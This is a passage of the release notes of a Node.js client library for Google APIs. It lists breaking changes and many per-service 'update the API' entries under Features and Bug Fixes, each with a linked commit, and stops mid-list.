This release has breaking changes. - **dataform:** This release has breaking changes. - **contentwarehouse:** This release has breaking changes. - **content:** This release has breaking changes. - **compute:** This release has breaking changes. - **beyondcorp:** This release has breaking changes. - **alloydb:** This release has breaking changes. - **aiplatform:** This release has breaking changes. ##### Features - **accessapproval:** update the API ([88f6ef5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88f6ef52f6b19a90962acb1604694da5e22af1d0)) - **admin:** update the API ([b6fff85](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6fff8553fc561f5c16d8bd46ded439bb793ea8a)) - **adsense:** update the API ([5349cf9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5349cf9808017b594380ade8c94aed81a3330ed2)) - **advisorynotifications:** update the API ([9c37105](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9c371058f141e1b30567a74d35245c0d116e9f02)) - **aiplatform:** update the API ([56cde03](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/56cde03e4eb6283561515ecac8435ad28f49dda9)) - **alertcenter:** update the API ([10d8698](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10d869861c193788a3150515b2d8ec323517bc38)) - **alloydb:** update the API ([51ad37e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/51ad37ee97ac19ca26c26c645f39f8d9d3fde0cd)) - **analyticsadmin:** update the API ([8b4c314](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8b4c31451d3ace85c48b8a1170eac09024c518e0)) - **analyticshub:** update the API ([d06ce46](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d06ce46d020c92976660e2e9ee68f35f0e2da2f6)) - **androidmanagement:** update the API ([bb2dc2d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bb2dc2d1e3d99b2a27bfe9f1b517ab257cc886bf)) - **androidpublisher:** update the API ([f58a3c8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f58a3c8544b91d6cb987f2b72f200e7b79eabe14)) - **appengine:** update the API ([543b45e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/543b45e8cad0556e923f2f44e61d3bf96675e1ca)) - **apphub:** update the API ([e9a8db0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e9a8db0b264dc78e526dae22ff7a33574406a360)) - **artifactregistry:** update the API ([5a5e4aa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a5e4aae48f826b6daec0493c4cfe79b4b0dfa4a)) - **authorizedbuyersmarketplace:** update the API ([351c7ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/351c7edca745cf8d996963e6816811eaaca09a04)) - **backupdr:** update the API ([9796834](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/97968343e02bd85538961138f02ed20976f53a02)) - **beyondcorp:** update the API ([7f20c02](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f20c0238728cae35a37e06b95e7dbb8cad57e2e)) - **bigqueryconnection:** update the API ([0e56135](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e56135413c3799c0543bb45510dede96970cb63)) - **bigquery:** update the API ([72b5d21](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/72b5d21ed11f1bcde638a1240c02d6ce03906844)) - **bigtableadmin:** update the API ([ad68d8c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad68d8c6e175573ebd5c54ec74328386d9dc8cd3)) - **blockchainnodeengine:** update the API ([7f0503c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f0503cc2cf3b7d7f90f0518a1deb592a4f313a4)) - **chat:** update the API ([0810516](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/081051658a22c7bf2cd8915838608f53fb620cd6)) - **cloudasset:** update the API ([4eb45be](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4eb45bed03811fb3f5c18967a0c7128ced2ee011)) - **cloudbuild:** update the API ([d20db7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d20db7be93195c69e6b1345bcf196aeab8b57b35)) - **clouddeploy:** update the API ([cd5014b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd5014bd87adbfbc2729f78f7d56bb4b8d42b7d7)) - **cloudsupport:** update the API ([ceb5503](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ceb5503e69b26a0838d8decc00ca17ebdcdda743)) - **compute:** update the API ([f84e98a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f84e98a33f39034e2cb7846fbc4c3fc6804a2ffa)) - **connectors:** update the API ([478d8c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/478d8c60beb0ccae9a89590f71802aa7843275e2)) - **contactcenteraiplatform:** update the API ([862d69b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/862d69b84cbbe5f9e6c34af4bfdfbe33990c9331)) - **contactcenterinsights:** update the API ([c1974c4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c1974c4b7385c84fdb70cd3c05e5ad601dbb4272)) - **container:** update the API ([8cd9863](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8cd986326583b69735627bae07263fad1595b7fb)) - **content:** update the API ([76546b8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76546b866ac0e675f27b2b9ab1727f4c821c17ac)) - **contentwarehouse:** update the API ([aa28685](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aa286853fecaa5d45d80e33e309ea388ea6ece97)) - **dataflow:** update the API ([ddd9231](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddd92315d9fff4a5a20493b1ce874f0974df3b82)) - **dataform:** update the API ([a43ddce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a43ddced989c08697f803f6d167f771ae27ecbcb)) - **datamigration:** update the API ([f0e692d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f0e692d9169793bc8abe3cd33982e36e04faf3ea)) - **dataplex:** update the API ([20e701c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/20e701c6dc51978418c70f58907d0d2c8d5d407d)) - **dataportability:** update the API ([50c5d63](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50c5d63f83ccf4e91e27e7322062a8edc24b33cf)) - **datastream:** update the API ([57a62ef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/57a62ef7920ab1ca1e18452b2749c3585a981736)) - **dialogflow:** update the API ([ddfc789](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddfc789b5c0c567d2ddc8241448e260bfb7ad20f)) - **discoveryengine:** update the API ([ec40fe5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec40fe54ac9bc032c370f8eaf436489a10b04159)) - **discovery:** update the API ([8d42dab](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8d42dab88214bc01e9a9678794b6015435b5071f)) - **displayvideo:** update the API ([90937cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90937cda7d6475fd0f04ac2332f3351f53f08b22)) - **dlp:** update the API ([88f0a64](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88f0a640104e95f5aa785b89658997746153915e)) - **dns:** update the API ([4688a5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4688a5ef2114c8ffcc15890ee47949431915841c)) - **documentai:** update the API ([b07b1aa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b07b1aa83a3be53769729f43afe252bab824b55a)) - **domains:** update the API ([d34c2a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d34c2a09071ea3431f88ce0b6be0757a9682f66e)) - **doubleclickbidmanager:** update the API ([0e6990d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e6990d73d7c576483a84b4dce75a5fd7fe3c0ad)) - **eventarc:** update the API ([0c28816](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0c2881683796bfbc7581c2b772ef6d630737ad02)) - **factchecktools:** update the API ([bd8d187](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd8d187f2fa9859b230c0292c509312b93fba7a5)) - **firestore:** update the API ([6d67fed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6d67fed98433e01900db319bc4747577cb6d6e3d)) - **games:** update the API ([99d63c1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99d63c1ce9e7a141ce34ca9ab3b85e7c24413357)) - **gkebackup:** update the API ([e90fb98](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e90fb98d64548538cbb810258e9fde7b3f3561fc)) - **gkehub:** update the API ([d4c3244](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d4c3244d232a2788ef39e85a3ba451227446ebb2)) - **gmail:** update the API ([a4d9319](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a4d9319ad50bbfd9e27ed7b4ff865951b7dd1032)) - **iam:** update the API ([2e9117f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2e9117f73657e08bcea4de889f49bbeca4cb6882)) - **iap:** update the API ([db72cb3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db72cb3acc75efc17df7dd0d6b4418e17c1c3c81)) - **logging:** update the API ([4317a72](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4317a72ef5752de222fafdaadb4be75267fedd4f)) - **marketingplatformadmin:** update the API ([ff87055](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ff8705570be84e5c2b93bac53dc6dc38923137ef)) - **metastore:** update the API ([57b1763](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/57b1763cd49724b461a5f85f8a6ef1cdebfdd500)) - **migrationcenter:** update the API ([3f91b3a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3f91b3abc6c81c7848e127563207299631cb1c7c)) - **monitoring:** update the API ([b601933](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6019332629f7f487a720bbedf58284f32bc84f2)) - **networkconnectivity:** update the API ([bb6e8ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bb6e8ffe0ccc87c117b7acbecf2ad9a52ec76158)) - **networkmanagement:** update the API ([3c9d201](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c9d20120e16a1c6df1c2cbac758d2fa28670c7b)) - **ondemandscanning:** update the API ([9efea7e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9efea7ec8fa03709a875f4e8131bcdf059ddd403)) - **orgpolicy:** update the API ([9abcb3a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9abcb3ab05e3f8ceac3d5f6fb77b69b6312d3d78)) - **paymentsresellersubscription:** update the API ([5c6228e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c6228e8693db8d5c3797148f0f547063beb23f1)) - **privateca:** update the API ([c8bed74](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c8bed74402e19d48227929a3c387663650c713fd)) - **pubsub:** update the API ([985ba9b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/985ba9bb35f3bd9db382497be3ec99d4c309cff4)) - **recaptchaenterprise:** update the API ([cd6af58](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd6af586c85f638a9e59647f9e14e13fbf4500c4)) - **redis:** update the API ([2896261](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/28962616def25002b1ab7eb995f220ba87646894)) - regenerate index files ([7cbd403](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cbd403f5f44d43aa9fb86f35b4b71ff16bf8511)) - **retail:** update the API ([5c3af10](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c3af10dc0c01bcba9ac1dd306ece2641e576f66)) - **run:** update the API ([4adbdec](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4adbdec9d3771f3c024f978fab7897e547825b11)) - **searchads360:** update the API ([03ca122](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/03ca122fba8a0ae1bf3cb482aefefd17eeba6adf)) - **securitycenter:** update the API ([8b08aa2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8b08aa2ac1d8bb8eb264f8bda3089da60b4f4028)) - **serviceconsumermanagement:** update the API ([8878e94](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8878e945849f0c8a2946789f554aa8f7d43d9db5)) - **servicecontrol:** update the API ([763243a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/763243a5a56fbc735a259bc8a0cd16046a9b5289)) - **servicenetworking:** update the API ([d481dce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d481dce95d7f9f899d9b62f78933a731159f381c)) - **serviceusage:** update the API ([41b76ee](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/41b76ee8d6beeeb3bbccdcbbcd0853f610a54171)) - **sheets:** update the API ([74b2d05](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74b2d057117112b9b6991f70dc47ac60a9945e82)) - **spanner:** update the API ([2d2e0f6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d2e0f64b7ceb23e7695939c367d74c7ce14fc2b)) - **sqladmin:** update the API ([7cc6d5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cc6d5e1283e44228e54acf2bdb10bbe5436996c)) - **tpu:** update the API ([d6658ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d6658ff0af9efce119b420c5da8cfcab7b882276)) - **trafficdirector:** update the API ([69f9252](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/69f92522ff9920b35c5a07302f509f86c49485df)) - **verifiedaccess:** update the API ([33544fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/33544fca5d8da32c49b7c9a803e6f818cd71abcb)) - **workloadmanager:** update the API ([855fab4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/855fab42662185d828978f3474b6eba492f4b674)) - **workstations:** update the API ([867515f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/867515ff691803da59aac961866bb6afb224a642)) - **youtube:** update the API ([7452149](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7452149d3d70dd45b10ceff77310aa09b6c2c57d)) ##### Bug Fixes - **abusiveexperiencereport:** update the API ([dfd4aa1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/dfd4aa1e515b9665f2fcdf4a13eecd267b386895)) - **acceleratedmobilepageurl:** update the API ([9b0387c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9b0387c44997aab7f305900eee6fcb8801d3f7ee)) - **accesscontextmanager:** update the API ([413c833](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/413c833b3273a224f9df5fc36fae40669724e4fb)) - **acmedns:** update the API ([4199c73](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4199c734fcde97cd00126d4531c0acfe7f4aad9a)) - **addressvalidation:** update the API ([3c51f3f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c51f3f5214e6465f25825ee8f37a773bbc7b07e)) - **adexchangebuyer2:** update the API ([ec9384a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec9384ab02f3f30493962122c90c0549c318c7d4)) - **adexperiencereport:** update the API ([8932647](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8932647c6be056c97fff0754cf4198ae9b55e6bd)) - **admob:** update the API ([7b699f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7b699f5f9cc2f565811caf67a944eaa104d22efb)) - **adsensehost:** update the API ([e4373ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e4373ed0b695c995317e6f735542a228df2022e7)) - **analyticsdata:** update the API ([9c8dcf8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9c8dcf8f9aae5858d453a0dae64ca9837672bc87)) - **analyticsreporting:** update the API ([4b2a5bd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4b2a5bdaf8aca2a581fec1e7ee1f534eb9867dca)) - **analytics:** update the API ([f7f9cc4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f7f9cc4b9f2bf47aedd233ecdfb43531b5dad3cd)) - **androiddeviceprovisioning:** update the API ([47d89cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/47d89cda619cdec6b83e826913e1ff92e090ced8)) - **androidenterprise:** update the API ([293c247](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/293c247fbf83fbe9b54c14cd991b69bfd9679996)) - **apigateway:** update the API ([7d02f2d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7d02f2dae2c63f6cf62de73fc1d3e1381f9f7ce1)) - **apigeeregistry:** update the API ([f627870](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f62787095c2439b882896130c259cedb810114de)) - **apikeys:** update the API ([f2ab501](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f2ab50102415317c56bb20fb7c1894505c86a7e9)) - **area120tables:** update the API ([ba9d3e6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ba9d3e6258f47ea0d0bb3dae9f484a9097f2bdad)) - **assuredworkloads:** update the API ([3dc3798](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3dc3798f56c03f0cf7136eb5d5e625ef2c3c21ee)) - **batch:** update the API ([10727a4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10727a4ccab11bd1203fa95cb14131a67804e7a5)) - **biglake:** update the API ([ebfd8c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ebfd8c6610f83f7ed63d21705f7d1eb2ed6db2d0)) - **bigquerydatapolicy:** update the API ([4871975](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/48719750b35826c4f147f8dc8601c90188dc8bee)) - **bigquerydatatransfer:** update the API ([05b9fc8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/05b9fc89e9f0b1b94092e50cef21b03044b836ba)) - **bigqueryreservation:** update the API ([9f226a3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9f226a3de413175cd44c76f45b19169010daaaa9)) - **billingbudgets:** update the API ([1190847](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1190847e882070097b0ef0fc74f23c5f162ecd16)) - **binaryauthorization:** update the API ([a5ad874](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a5ad874a862e827b55278bd56f25d6efbcc797c6)) - **blogger:** update the API ([285aa94](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/285aa9455d6afe92001fa4373c7a153124d9bf21)) - **books:** update the API ([b95f9af](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b95f9aff24842b3e2132f74913fb794699ea55be)) - **businessprofileperformance:** update the API ([92abfea](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/92abfea3a06b9714b650f6846469a434ff9d8c71)) - **calendar:** update the API ([a040e6d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a040e6d6ccbb5efbebd09db5e452e586072afc71)) - **certificatemanager:** update the API ([32dd53e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/32dd53e849a341afbd7f0f52548485167556f85d)) - **checks:** update the API ([37cb793](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/37cb793b61fbf605d4e94af20abbe6a75fab277d)) - **chromemanagement:** update the API ([2a9f611](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2a9f611d836a86cb36e0288ee13818238fac9a02)) - **chromepolicy:** update the API ([5f2b01b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5f2b01b222e12e7719296d6dbc885aa8b029c47b)) - **chromeuxreport:** update the API ([c7af220](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c7af220ffb1f7c5ee56a7e6ad0a87d9ff4c0e8a1)) - **civicinfo:** update the API ([74c8d7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74c8d7be47d07654832eca7a82ff54ab727e556a)) - **classroom:** update the API ([2183745](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2183745a478778c1009d91ab160f1546526c7746)) - **cloudbilling:** update the API ([f8baaac](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f8baaac306d170b837cf2eb544edae932d13ed98)) - **cloudchannel:** update the API ([a65c068](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a65c068d0595e90214d69be0ab74af66c80ad62d)) - **cloudcontrolspartner:** update the API ([5a7437b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a7437badd218eb3b92544397baa440040d2f3a6)) - **clouderrorreporting:** update the API ([4c557f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4c557f5a186799c1f4abe3b7afa3b1481f187b14)) - **cloudfunctions:** update the API ([fc21faf](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fc21faf20d3f7a4a70c035cea20fc36082a247b9)) - **cloudidentity:** update the API ([3d288c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3d288c674958a8ece72b1bb73764b9549b3cbc1c)) - **cloudkms:** update the API ([93e0687](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/93e06878abf84ad8b1df3f12ace0f067b1f25098)) - **cloudprofiler:** update the API ([d11e9e4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d11e9e41137ae8d062bd4ed084a350b0bde8d3c0)) - **cloudresourcemanager:** update the API ([76f0f51](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76f0f511f97312e3aa7a41f14befa836ce44df55)) - **cloudscheduler:** update the API ([94305b7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/94305b7da4ccfab0e63b613d6a7fcbe33864270d)) - **cloudsearch:** update the API ([e6de73d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e6de73da3a7cf1c269ef6017843ccf6fd078f154)) - **cloudshell:** update the API ([f399b75](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f399b75d0d63674a28970f589aea6f01eab1577b)) - **cloudtasks:** update the API ([31dbbe2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/31dbbe2439fabe0f0fc1b8f3377a305fee87c2c0)) - **cloudtrace:** update the API ([212d697](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/212d697a0e2654ba1bb8f2775bf039b57be3a6cd)) - **composer:** update the API ([75304a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/75304a070d61822ec87af425147acf2a3e72afdf)) - **config:** update the API ([07be765](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/07be7657dd18a230d4e2390f156263a98fdae02a)) - **containeranalysis:** update the API ([90afb7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90afb7bddfde862f89ed2f599ca74bf8e2002e8c)) - **customsearch:** update the API ([dc6b156](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/dc6b156aaa9bcb1d45356db3c3a7058ed0720c04)) - **datacatalog:** update the API ([64c1abc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/64c1abc7e78bbe9a213c1c696a83389ca1b8d313)) - **datafusion:** update the API ([6aff1d8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6aff1d8ecad16691a2b9d5ab4b5bfacf2680c8a0)) - **datalabeling:** update the API ([797471f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/797471fb5f97302a1ab7f50587298aee650bf372)) - **datapipelines:** update the API ([e108596](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e10859679756d3c1fe243ade7b4ff096d4057f7a)) - **dataproc:** update the API ([abbcb61](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/abbcb618952a5c365ef553b83f88bd4fc6a19c68)) - **datastore:** update the API ([fe99c43](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fe99c436b00f3e0db1c048b6e1978c2c91eeaf75)) - **deploymentmanager:** update the API ([87fda2a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/87fda2a3b88f81077ed5f18f52e0263644ba19cb)) - **dfareporting:** update the API ([4cec666](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4cec666a18587527e4973548112080ccafaa9e37)) - **digitalassetlinks:** update the API ([abe8c25](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/abe8c25a24e1c1e521338d1ece3f8124c08ed686)) - **docs:** update the API ([5c28cc5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c28cc5f90c3ec07902952673a54a9439aebaefe)) - **domainsrdap:** update the API ([f3678df](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f3678df1b0f9621c9319be5c32b5c1ae0257409f)) - **doubleclicksearch:** update the API ([f6e9c9a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f6e9c9a07c6871be0b722532e09a1079fa2aa84d)) - **driveactivity:** update the API ([63563b6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/63563b6d89ccdb8a778089c48a649d212ae41187)) - **drivelabels:** update the API ([44db39e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/44db39ea335d5b3566c1f6a751f32eb159427c6a)) - **drive:** update the API ([5f88b3e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5f88b3e4deaa2aa30bc78df0e5c2e9e387e7d161)) - **essentialcontacts:** update the API ([6bc249f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6bc249f5d12c4975f3569ad735fe6b14875960a7)) - **fcmdata:** update the API ([da072ae](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/da072ae63e796156028c0b28863adfef9d1887b8)) - **fcm:** update the API ([c2043ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2043ed711270a5e38a0842b539898e9d289f436)) - **file:** update the API ([4bbf0b9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4bbf0b92661f5ea47f09eefecf48238ab13980f1)) - **firebaseappcheck:** update the API ([851d463](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/851d4639bf75850c4ab88c1dad4dfd9166f9801b)) - **firebaseappdistribution:** update the API ([96163b7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/96163b73f732144c3da840b18d6a55aac62d6081)) - **firebasedatabase:** update the API ([3d96170](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3d96170cc795827c84a53e0c3d0de526a12b9d95)) - **firebasedynamiclinks:** update the API ([1122f63](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1122f63e79402abe5be53a38334c565ca883ad18)) - **firebasehosting:** update the API ([6abce84](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6abce84cf7567d906dc94c64700c8bc42c55de4a)) - **firebaseml:** update the API ([eef0dfe](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/eef0dfe82ab1c082959cdb168d9c8e438b98606b)) - **firebaserules:** update the API ([d02b49c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d02b49c84908b0757a6525665b9451092c0ee3dd)) - **firebasestorage:** update the API ([b303956](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b303956d395587471344b89bf546068d89b6b1a8)) - **firebase:** update the API ([38f0247](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/38f024730891a3e566ac49a18dd2786768f8fe10)) - **fitness:** update the API ([bd72df1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd72df18aba9c830b788a5ac4fd260ba693ce31d)) - **forms:** update the API ([e06cd96](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e06cd96538ce8a44d850c8cc29aabcdf0b180ab9)) - **gamesConfiguration:** update the API ([b26b164](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b26b16406b25d2cc66aeb21bbb4eb7d366c4f6ac)) - **gamesManagement:** update the API ([c056dbb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c056dbb47b86bf807f7a536281f4ec9f715b1b3b)) - **gkeonprem:** update the API ([50b340a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50b340ab8c56308486f8f47f15cf76c010300137)) - **gmailpostmastertools:** update the API ([2d1dd45](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d1dd456fd959314d4dfdd5066f32304ca6534a4)) - **groupsmigration:** update the API ([2d5dfc8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d5dfc87a79567d6c65713279d9e169f791edd15)) - **groupssettings:** update the API ([81f7c45](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/81f7c4560d45065ccd96c24d05094c7b5de59580)) - **healthcare:** update the API ([4dcb153](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4dcb1532b818deed3e14b43d2e42de87d68a71ab)) - **homegraph:** update the API ([709f585](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/709f58538c74d97ac0508b3d5fd6518502401614)) - **iamcredentials:** update the API ([0610412](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/06104128540bdc9565a0cd8cdb812aafe4025ba2)) - **identitytoolkit:** update the API ([99534fb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99534fba8b394219448155ab565154cfa5710b15)) - **ids:** update the API ([5ad0d0b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5ad0d0ba7b827d5b24e69baa8ec6fb6aff738d2f)) - **indexing:** update the API ([3c4e15a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c4e15a098c8cfaa8ac116046553bac0ca1cd7cb)) - **jobs:** update the API ([7687e7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7687e7b88acbf1c0803bb9490593839728e013e5)) - **kgsearch:** update the API ([5a54be2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a54be26f5328c9a0b167cc06e4026358e1970df)) - **kmsinventory:** update the API ([3ac181b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3ac181bbd6283099b1ea29b1371c61eb0e211773)) - **language:** update the API ([91caf34](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/91caf3471150689b54fa2a51cde93de44c595df7)) - **libraryagent:** update the API ([50b72ef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50b72ef609e5c9058b5a03ed5aaa1b5062e4bf47)) - **licensing:** update the API ([b6f27e9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6f27e942a89e4597e1c212a700b26f51ddb7bf9)) - **lifesciences:** update 